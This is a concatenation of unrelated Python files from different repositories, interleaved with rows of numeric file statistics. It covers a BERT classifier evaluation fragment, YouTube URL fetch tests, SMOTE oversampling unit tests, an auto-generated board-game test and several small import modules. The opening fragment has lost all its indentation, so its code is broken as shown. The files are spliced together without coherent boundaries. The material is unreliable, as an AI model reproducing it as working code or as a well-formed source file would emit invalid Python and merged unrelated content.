loss = criterion(prediction, labels[i].unsqueeze(0).argmax(dim=1)) # must be (1. nn output, 2. target)
loss_test += loss.item()
if class_label == trg_label:
correct += 1
else:
print(class_label, trg_label)
wrong += 1
out.write(str(submitter_ids[i]) + " " + str(reviewer_ids[i]) + " " + str(class_label.data.cpu()) + " " + str(trg_label.data.cpu()))
print("Accuracy:", correct/len(labels), " Test Loss:", loss_test/len(labels))
out.write("Accuracy:"+ str(correct/len(labels)) + " Test Loss:" + str(loss_test/len(labels)))
out.close()
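# Hypothetical call for the evaluator above (path, model name and id lists
# are placeholders); the saved "<m_name>.model" file must exist under `path`:
#
#     eval_classification("./models", test_sub, test_rev, test_labels,
#                         nn.CrossEntropyLoss(), "bert",
#                         submitter_ids, reviewer_ids)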
def seq_cosineSimilarity_paper(reviewer, submitter):
affinity = dict()
for each in submitter.keys():
temp = dict()
for review in reviewer.keys():
if len(reviewer[review]) == 1:
cos = nn.CosineSimilarity(dim=1)
temp[review] = [cos(submitter[each], reviewer[review][0]).numpy()[0]]
else:
cos = nn.CosineSimilarity(dim=1)
if review not in temp:
temp[review] = [cos(submitter[each], reviewer[review][0]).numpy()[0]]
for j in range(1,len(reviewer[review])):
temp[review].append(cos(submitter[each], reviewer[review][j]).numpy()[0])
sorted_scores = sorted(temp[review], key=float, reverse=True)
temp_review = []
if len(sorted_scores) < 5:
temp[review] = sorted_scores
else:
temp[review] = sorted_scores[:5]
if each in affinity.keys():
affinity[each].update(temp)
else:
affinity[each] = temp
return affinity
def seq_cosineSimilarity(reviewer, submitter):
affinity = dict()
for each in submitter.keys():
temp = dict()
for review in reviewer.keys():
if review not in temp:
cos = nn.CosineSimilarity(dim=1)
temp[review] = cos(submitter[each], reviewer[review])[0]
else:
cos = nn.CosineSimilarity(dim=1)
temp[review].update(cos(submitter[each], reviewer[review])[0])
if each in affinity.keys():
affinity[each].update(temp)
else:
affinity[each] = temp
return affinity
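# Minimal example of the similarity primitive used by both functions above
# (illustrative; 768 is an assumed embedding size):
#
#     cos = nn.CosineSimilarity(dim=1)
#     a = torch.randn(1, 768)
#     b = torch.randn(1, 768)
#     score = cos(a, b)[0]  # scalar tensor in [-1, 1]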
#from sklearn.neighbors import NearestNeighbors
#nbrs = NearestNeighbors(n_neighbors=100, algorithm='ball_tree').fit(papers)
#dist, indices = nbrs.kneighbors(papers)
| 46.089974 | 159 | 0.603045 | 2,356 | 17,929 | 4.381155 | 0.081919 | 0.044468 | 0.030227 | 0.027998 | 0.873765 | 0.845185 | 0.836853 | 0.819705 | 0.801395 | 0.797907 | 0 | 0.011352 | 0.263038 | 17,929 | 388 | 160 | 46.208763 | 0.769848 | 0.044899 | 0 | 0.772727 | 0 | 0 | 0.04463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057576 | false | 0 | 0.027273 | 0 | 0.109091 | 0.084848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
91e9fe27dd70e75b8a878c81cbc4e90bd0eecbea | 811 | py | Python | tests/test_youtube_url.py | gromperen/spotify-dl | b2b22ff0b7d72785b8dfa694f2d6402d228e2c19 | [
"MIT"
] | null | null | null | tests/test_youtube_url.py | gromperen/spotify-dl | b2b22ff0b7d72785b8dfa694f2d6402d228e2c19 | [
"MIT"
] | null | null | null | tests/test_youtube_url.py | gromperen/spotify-dl | b2b22ff0b7d72785b8dfa694f2d6402d228e2c19 | [
"MIT"
] | null | null | null | from spotify_dl.youtube import fetch_youtube_url, get_youtube_dev_key
def test_fetch_youtube_url(capsys):
song_link = fetch_youtube_url("Red Hot Chili Peppers - Dani California [Official Music Video]",
get_youtube_dev_key())
assert song_link == 'https://www.youtube.com/watch?v=Sb5aq5HcS1A'
def test_fetch_youtube_url_wth_scrape(capsys):
song_link = fetch_youtube_url("Red Hot Chili Peppers - Dani California [Official Music Video]", dev_key=None)
assert song_link == 'https://www.youtube.com/watch?v=Sb5aq5HcS1A'
def test_fetch_youtube_url_with_invidious(capsys):
song_link = fetch_youtube_url("Red Hot Chili Peppers - Dani California [Official Music Video]", use_invidious=True)
assert song_link == 'https://www.youtube.com/watch?v=Sb5aq5HcS1A'
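# The three tests above resolve the same query through the YouTube Data API
# (dev key), plain scraping (dev_key=None) and an Invidious instance, and
# all expect the identical watch URL.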
| 50.6875 | 119 | 0.748459 | 116 | 811 | 4.922414 | 0.327586 | 0.14711 | 0.183888 | 0.099825 | 0.788091 | 0.749562 | 0.749562 | 0.749562 | 0.749562 | 0.749562 | 0 | 0.013139 | 0.155364 | 811 | 15 | 120 | 54.066667 | 0.820438 | 0 | 0 | 0.272727 | 0 | 0 | 0.388409 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 1 | 0.272727 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
37e40026c08456f144223019e40edcb183800611 | 133 | py | Python | doltcli/tag_mixin.py | TannerAMay/doltcli | 0d073d65a20530f40e25fd696629d473600a634c | [
"Apache-2.0"
] | null | null | null | doltcli/tag_mixin.py | TannerAMay/doltcli | 0d073d65a20530f40e25fd696629d473600a634c | [
"Apache-2.0"
] | null | null | null | doltcli/tag_mixin.py | TannerAMay/doltcli | 0d073d65a20530f40e25fd696629d473600a634c | [
"Apache-2.0"
] | null | null | null | class TagMixin:
def list_tag(self):
pass
def create_tag(self):
pass
def delete_tag(self):
pass
| 13.3 | 25 | 0.556391 | 17 | 133 | 4.176471 | 0.529412 | 0.295775 | 0.464789 | 0.394366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.368421 | 133 | 9 | 26 | 14.777778 | 0.845238 | 0 | 0 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0.428571 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 8 |
37e92938cd947993d7214d619cf6cdac8b84d883 | 122 | py | Python | S02 - Data Wrangling/BLU03 - Data Sources/utils/__init__.py | jtiagosg/batch3-students | 5eb94bee46625881e9470da2b137aaa0f6cf7912 | [
"MIT"
] | 12 | 2019-07-06T09:06:17.000Z | 2020-11-13T00:58:42.000Z | S02 - Data Wrangling/BLU03 - Data Sources/utils/__init__.py | jtiagosg/batch3-students | 5eb94bee46625881e9470da2b137aaa0f6cf7912 | [
"MIT"
] | 29 | 2019-07-01T14:19:49.000Z | 2021-03-24T13:29:50.000Z | S02 - Data Wrangling/BLU03 - Data Sources/utils/__init__.py | jtiagosg/batch3-students | 5eb94bee46625881e9470da2b137aaa0f6cf7912 | [
"MIT"
] | 36 | 2019-07-05T15:53:35.000Z | 2021-07-04T04:18:02.000Z | from .friendly_prints import friendly_print_string, friendly_print_vat, friendly_print_beers, friendly_print_soup_children | 122 | 122 | 0.918033 | 17 | 122 | 6 | 0.588235 | 0.509804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04918 | 122 | 1 | 122 | 122 | 0.87931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
5346c39fd1a636fd03f8b49a5e315f7b837ceefc | 11,857 | py | Python | imblearn/over_sampling/tests/test_smote.py | seabay/UnbalancedDataset | b15b868019343052d4b57bf748d658367166c8b3 | [
"MIT"
] | 1 | 2018-07-11T06:47:11.000Z | 2018-07-11T06:47:11.000Z | imblearn/over_sampling/tests/test_smote.py | seabay/UnbalancedDataset | b15b868019343052d4b57bf748d658367166c8b3 | [
"MIT"
] | null | null | null | imblearn/over_sampling/tests/test_smote.py | seabay/UnbalancedDataset | b15b868019343052d4b57bf748d658367166c8b3 | [
"MIT"
] | null | null | null | """Test the module SMOTE."""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# Christos Aridas
# License: MIT
from __future__ import print_function
import numpy as np
from pytest import raises
from sklearn.utils.testing import assert_allclose, assert_array_equal
from sklearn.neighbors import NearestNeighbors
from sklearn.svm import SVC
from imblearn.over_sampling import SMOTE
RND_SEED = 0
X = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956,
-0.49283504], [-0.28162401, -2.10400981],
[0.83680821,
1.72827342], [0.3084254, 0.33299982], [0.70472253, -0.73309052],
[0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234]])
Y = np.array([0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0])
R_TOL = 1e-4
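# The tests below share one pattern: fit a SMOTE variant on the fixture
# above and compare against precomputed resampled arrays. As a standalone
# sketch (illustrative, using the same fit_sample API as this suite):
#
#     smote = SMOTE(kind='regular', random_state=RND_SEED)
#     X_res, y_res = smote.fit_sample(X, Y)
#     # class 0 (the minority here, 8 of 20 samples) gains synthetic points
#     # interpolated between a sample and one of its nearest neighbours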
def test_smote_wrong_kind():
kind = 'rnd'
smote = SMOTE(kind=kind, random_state=RND_SEED)
with raises(ValueError, match="Unknown kind for SMOTE"):
smote.fit_sample(X, Y)
def test_sample_regular():
kind = 'regular'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.29307743, -0.14670439], [0.84976473, -0.15570176],
[0.61319159, -0.11571668], [0.66052536, -0.28246517]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_regular_half():
sampling_strategy = {0: 9, 1: 12}
kind = 'regular'
smote = SMOTE(
sampling_strategy=sampling_strategy, random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.36784496, -0.1953161]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_borderline1():
kind = 'borderline1'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.3765279, -0.2009615], [0.55276636, -0.10550373],
[0.45413452, -0.08883319], [1.21118683, -0.22817957]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_borderline2():
kind = 'borderline2'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.47436888, -0.2645749],
[1.07844561, -0.19435291], [0.33339622, 0.49870937]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_svm():
kind = 'svm'
smote = SMOTE(random_state=RND_SEED, kind=kind)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.47436888, -0.2645749],
[1.07844561, -0.19435291], [1.44015515, -1.30621303]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_fit_sample_nn_obj():
kind = 'borderline1'
nn_m = NearestNeighbors(n_neighbors=11)
nn_k = NearestNeighbors(n_neighbors=6)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, m_neighbors=nn_m)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.3765279, -0.2009615], [0.55276636, -0.10550373],
[0.45413452, -0.08883319], [1.21118683, -0.22817957]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_regular_with_nn():
kind = 'regular'
nn_k = NearestNeighbors(n_neighbors=6)
smote = SMOTE(random_state=RND_SEED, kind=kind, k_neighbors=nn_k)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049], [
-0.41635887, -0.38299653
], [0.08711622, 0.93259929], [1.70580611, -0.11219234],
[0.29307743, -0.14670439], [0.84976473, -0.15570176],
[0.61319159, -0.11571668], [0.66052536, -0.28246517]])
y_gt = np.array([
0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0
])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_wrong_nn():
kind = 'borderline1'
nn_m = 'rnd'
nn_k = NearestNeighbors(n_neighbors=6)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, m_neighbors=nn_m)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
nn_k = 'rnd'
nn_m = NearestNeighbors(n_neighbors=10)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, m_neighbors=nn_m)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
kind = 'regular'
nn_k = 'rnd'
smote = SMOTE(random_state=RND_SEED, kind=kind, k_neighbors=nn_k)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
def test_sample_regular_with_nn_svm():
kind = 'svm'
nn_k = NearestNeighbors(n_neighbors=6)
svm = SVC(random_state=RND_SEED)
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, svm_estimator=svm)
X_resampled, y_resampled = smote.fit_sample(X, Y)
X_gt = np.array([[0.11622591, -0.0317206], [0.77481731, 0.60935141], [
1.25192108, -0.22367336
], [0.53366841, -0.30312976], [1.52091956, -0.49283504], [
-0.28162401, -2.10400981
], [0.83680821, 1.72827342], [0.3084254, 0.33299982], [
0.70472253, -0.73309052
], [0.28893132, -0.38761769], [1.15514042, 0.0129463], [
0.88407872, 0.35454207
], [1.31301027, -0.92648734], [-1.11515198, -0.93689695], [
-0.18410027, -0.45194484
], [0.9281014, 0.53085498], [-0.14374509, 0.27370049],
[-0.41635887, -0.38299653], [0.08711622, 0.93259929],
[1.70580611, -0.11219234], [0.47436888, -0.2645749],
[1.07844561, -0.19435291], [1.44015515, -1.30621303]])
y_gt = np.array(
[0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0])
assert_allclose(X_resampled, X_gt, rtol=R_TOL)
assert_array_equal(y_resampled, y_gt)
def test_sample_regular_wrong_svm():
kind = 'svm'
nn_k = NearestNeighbors(n_neighbors=6)
svm = 'rnd'
smote = SMOTE(
random_state=RND_SEED, kind=kind, k_neighbors=nn_k, svm_estimator=svm)
with raises(ValueError, match="has to be one of"):
smote.fit_sample(X, Y)
| 42.346429 | 79 | 0.589188 | 1,728 | 11,857 | 3.913773 | 0.087963 | 0.021292 | 0.023954 | 0.021292 | 0.890877 | 0.882301 | 0.880526 | 0.880526 | 0.880526 | 0.872246 | 0 | 0.427458 | 0.231509 | 11,857 | 279 | 80 | 42.498208 | 0.31475 | 0.009615 | 0 | 0.82996 | 0 | 0 | 0.015509 | 0 | 0 | 0 | 0 | 0 | 0.068826 | 1 | 0.044534 | false | 0 | 0.02834 | 0 | 0.072874 | 0.004049 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5364bfc73122723a39f26ac6c152831db82f9e79 | 4,389 | py | Python | z2/part3/updated_part2_batch/jm/parser_errors_2/202972000.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/202972000.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/202972000.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 202972000
"""
"""
random actions, total chaos
"""
board = gamma_new(5, 5, 3, 10)
assert board is not None
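# gamma_new(width, height, players, areas): a 5x5 board for 3 players with
# an assumed limit of 10 areas per player (parameter meaning inferred from
# usage in this generated test).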
assert gamma_move(board, 2, 4, 1) == 1
assert gamma_free_fields(board, 2) == 24
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 2, 3) == 1
assert gamma_move(board, 1, 2, 0) == 1
assert gamma_move(board, 1, 2, 1) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_move(board, 2, 4, 0) == 1
assert gamma_busy_fields(board, 2) == 3
assert gamma_free_fields(board, 2) == 19
assert gamma_move(board, 3, 3, 1) == 1
assert gamma_move(board, 1, 0, 1) == 1
assert gamma_move(board, 1, 1, 2) == 1
assert gamma_free_fields(board, 1) == 16
assert gamma_golden_possible(board, 1) == 1
assert gamma_free_fields(board, 2) == 16
assert gamma_move(board, 3, 0, 0) == 1
assert gamma_move(board, 3, 0, 2) == 1
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 1, 3, 4) == 1
assert gamma_move(board, 1, 1, 0) == 1
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 2, 1, 4) == 1
board627339973 = gamma_board(board)
assert board627339973 is not None
assert board627339973 == (".2.1.\n" "2.3..\n" "31...\n" "1.132\n" "311.2\n")
del board627339973
board627339973 = None
assert gamma_move(board, 3, 2, 4) == 1
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 1, 4, 4) == 1
assert gamma_busy_fields(board, 1) == 7
assert gamma_move(board, 2, 2, 2) == 1
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 1, 1, 1) == 1
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_golden_move(board, 2, 0, 1) == 1
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_busy_fields(board, 3) == 5
assert gamma_move(board, 1, 3, 2) == 1
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 2, 4) == 0
assert gamma_free_fields(board, 2) == 6
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 3, 0, 0) == 0
assert gamma_busy_fields(board, 1) == 8
assert gamma_move(board, 2, 3, 1) == 0
assert gamma_golden_move(board, 2, 0, 0) == 0
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_move(board, 3, 3, 3) == 1
assert gamma_move(board, 1, 3, 4) == 0
assert gamma_move(board, 1, 1, 2) == 0
assert gamma_move(board, 2, 0, 4) == 1
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_golden_possible(board, 2) == 0
assert gamma_move(board, 3, 0, 3) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 2, 4) == 0
assert gamma_free_fields(board, 2) == 4
assert gamma_move(board, 3, 0, 2) == 0
assert gamma_move(board, 1, 2, 4) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 3, 1, 0) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 3, 3) == 0
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 2, 2, 2) == 0
assert gamma_move(board, 3, 2, 4) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_busy_fields(board, 2) == 7
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_busy_fields(board, 3) == 6
assert gamma_free_fields(board, 1) == 4
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 2, 3) == 0
assert gamma_move(board, 3, 0, 3) == 0
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 4, 4) == 0
board172176651 = gamma_board(board)
assert board172176651 is not None
assert board172176651 == ("22311\n" "2.33.\n" "3121.\n" "21132\n" "311.2\n")
del board172176651
board172176651 = None
assert gamma_move(board, 2, 3, 3) == 0
assert gamma_move(board, 3, 3, 4) == 0
assert gamma_move(board, 3, 4, 4) == 0
assert gamma_free_fields(board, 3) == 4
assert gamma_golden_possible(board, 3) == 1
assert gamma_move(board, 1, 0, 3) == 0
assert gamma_move(board, 1, 4, 4) == 0
assert gamma_move(board, 2, 0, 3) == 0
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_busy_fields(board, 2) == 7
assert gamma_move(board, 3, 3, 1) == 0
assert gamma_move(board, 3, 1, 4) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_golden_move(board, 1, 3, 0) == 0
assert gamma_move(board, 2, 3, 1) == 0
gamma_delete(board)
| 33.25 | 76 | 0.67692 | 822 | 4,389 | 3.451338 | 0.059611 | 0.356715 | 0.359535 | 0.47938 | 0.826225 | 0.806486 | 0.723299 | 0.584068 | 0.5178 | 0.498061 | 0 | 0.12817 | 0.164502 | 4,389 | 131 | 77 | 33.503817 | 0.645487 | 0 | 0 | 0.382609 | 0 | 0 | 0.016275 | 0 | 0 | 0 | 0 | 0 | 0.843478 | 1 | 0 | false | 0 | 0.008696 | 0 | 0.008696 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5367bcd2cb3726f822b27dbcd3fc22d4185ba7d9 | 191 | py | Python | screens/__init__.py | osava-nsit/osava | 28b972d12a3c3420753ade560f628da35e9d592d | [
"Apache-2.0"
] | 34 | 2017-02-05T12:08:05.000Z | 2022-01-26T17:49:13.000Z | screens/__init__.py | osava-nsit/osava | 28b972d12a3c3420753ade560f628da35e9d592d | [
"Apache-2.0"
] | 1 | 2017-02-07T18:25:42.000Z | 2017-02-07T19:26:21.000Z | screens/__init__.py | osava-nsit/osava | 28b972d12a3c3420753ade560f628da35e9d592d | [
"Apache-2.0"
] | 2 | 2017-03-31T09:11:36.000Z | 2021-06-25T16:59:48.000Z | from cpu_screens import *
from deadlock_avoidance_screens import *
from deadlock_detection_screens import *
from disk_screens import *
from memory_screens import *
from page_screens import *
